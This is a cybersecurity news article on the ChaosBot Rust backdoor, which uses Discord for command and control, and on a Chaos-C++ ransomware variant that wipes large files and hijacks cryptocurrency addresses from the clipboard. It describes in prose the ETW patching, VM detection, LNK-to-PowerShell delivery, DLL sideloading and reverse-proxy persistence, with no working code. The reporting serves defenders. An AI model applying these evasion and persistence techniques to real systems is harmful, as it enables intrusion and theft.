ChaosBot, New Rust-Based Malware Uses Discord Channels to Access Victims’ PCs -

Post Views: 210

“A latest rust-based malware known as ChaosBot is making a huge ruckus by using Discord channels to access targets’ PCs.”

Details of a new Rust-based backdoor known as ChaosBot, which enables operators to perform surveillance and run arbitrary instructions on infected hosts, have been made public by cybersecurity experts.

eSentire, Technical Report

“Threat actors used compromised credentials that linked to an overprivileged Active Directory account called’serviceaccount’ as well as a Cisco VPN.”

“They used WMI to run remote commands across network systems using the hacked account, which made it easier to deploy and run ChaosBot.”

According to the Canadian cybersecurity firm, the virus was initially discovered in the environment of a financial services client in late September 2025.

“Event Tracing for Windows [ETW] and virtual computers are circumvented by new ChaosBot variants using evasion tactics.”

“The first method is to patch the ntdll’s initial few instructions! EtwEventWrite (eax -> ret, xor eax). The second method compares the system’s MAC addresses to prefixes for virtual machine MAC addresses that are known for VMware and VirtualBox. The malware removes itself if a match is discovered.

Chaos has evolved into a more aggressive and complex danger with the goal of maximizing financial benefit, as evidenced by its dual approach of harmful encryption and covert financial thievery.

The misuse of Discord for command-and-control (C2) by ChaosBot is notable. The online persona “chaos_00019” is used by the threat actor behind it to issue remote orders to the compromised devices, and this profile on Discord is where it gets its name. Lovebb0024 is a second Discord user account linked to C2 operations.

Alternatively, phishing communications that contain a malicious Windows shortcut (LNK) file have also been seen to be used by the malware as a dissemination channel. If the recipient of the letter opens the LNK file, a PowerShell command is run to download and run ChaosBot, and as a diversion, a fake PDF that looks like official communication from the State Bank of Vietnam is shown.

Using the Microsoft Edge binary “identity_helper.exe,” the malicious DLL (“msedge_elf.dll”) is sideloaded. It then conducts system reconnaissance and downloads a fast reverse proxy (FRP) in order to open a reverse proxy into the network and keep access to the compromised network for as long as possible.

Additionally, it has been discovered that the threat actors use the malware to try and set up a Visual Studio Code Tunnel service to function as an extra backdoor and enable command execution capabilities. However, the main purpose of the malware is to communicate with a Discord channel that the operator built using the victim’s computer identity in order to obtain additional instructions.

Some of the supported commands are listed below –

shell, to use PowerShell to run shell commands
scr, to take screenshots
download, to transfer data to the victim’s device
upload, to add a file to the Discord group

Chaos Ransomware has Destructive & Clipboard Hijacking Factors

The revelation comes from Fortinet FortiGuard Labs described a new C++ version of Chaos ransomware that can permanently erase large files instead of encrypting them and alter clipboard content by switching Bitcoin addresses with a wallet controlled by the attacker to reroute cryptocurrency transfers.

The attackers hope to establish Chaos-C++ ransomware as a powerful weapon that can not only encrypt files but also erase the contents of any file greater than 1.3 GB and enable financial fraud by combining destructive extortion techniques with clipboard hijacking for cryptocurrency theft.

To fool users into installing it, the Chaos-C++ ransomware downloader impersonates legitimate programs like System Optimizer v2.1. It is important to note that earlier versions of the Chaos ransomware, such as Lucky Gh0$t, were disseminated under the pretense of InVideo AI and OpenAI ChatGPT.

The malware looks for a file called “%APPDATA%\READ_IT.txt,” which indicates that the ransomware has already been run on the computer, after it has been launched. It goes into what is known as a monitoring mode to keep an eye on the system clipboard if the file is present.

If the file is not present, Chaos-C++ first determines whether it is operating with administrative privileges. If it is, it then executes a set of commands to prevent system recovery. After that, it starts the encryption process to completely encrypt files under 50 MB, ignoring those between 50 MB and 1.3 GB, presumably for efficiency.

Fortinet

“Chaos-C++ uses a variety of techniques, such as symmetric or asymmetric encryption and a fallback XOR procedure, rather than depending only on full file encryption.”

“Its flexible downloader ensures successful execution as well. When combined, these strategies strengthen the ransomware’s execution and make it more difficult to stop.

Velociraptor DFIR Tool is used as a Weapon by Hackers in LockBit Ransomware Attacks